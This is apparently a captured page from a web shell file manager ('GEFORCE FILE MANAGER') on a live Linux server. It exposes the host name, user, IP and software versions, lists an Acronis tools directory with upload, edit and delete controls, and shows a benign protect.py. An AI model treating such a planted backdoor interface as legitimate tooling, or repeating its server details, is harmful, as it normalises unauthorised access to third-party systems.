[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
Acronis
/
PyTools
/
commands
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 __pycache__
SET
[ DEL ]
📄 auto_update.py
2,909 B
SET
[ EDIT ]
|
[ DEL ]
📄 protect.py
408 B
SET
[ EDIT ]
|
[ DEL ]
📄 retention.py
9,876 B
SET
[ EDIT ]
|
[ DEL ]
📄 retention_specs.py
1,284 B
SET
[ EDIT ]
|
[ DEL ]
📄 run_tool.py
817 B
SET
[ EDIT ]
|
[ DEL ]
📄 staging.py
732 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: protect.py
import acrort import acrobind.protection def deploy(*args, **kw): ctx = acrort.remoting.CommandContext(*args, **kw) result = acrobind.protection.deploy_plan(ctx.argument, ctx.connection) return result def protect_now(*args, **kw): ctx = acrort.remoting.CommandContext(*args, **kw) result = acrobind.protection.protect_now(ctx.argument, ctx.connection) return result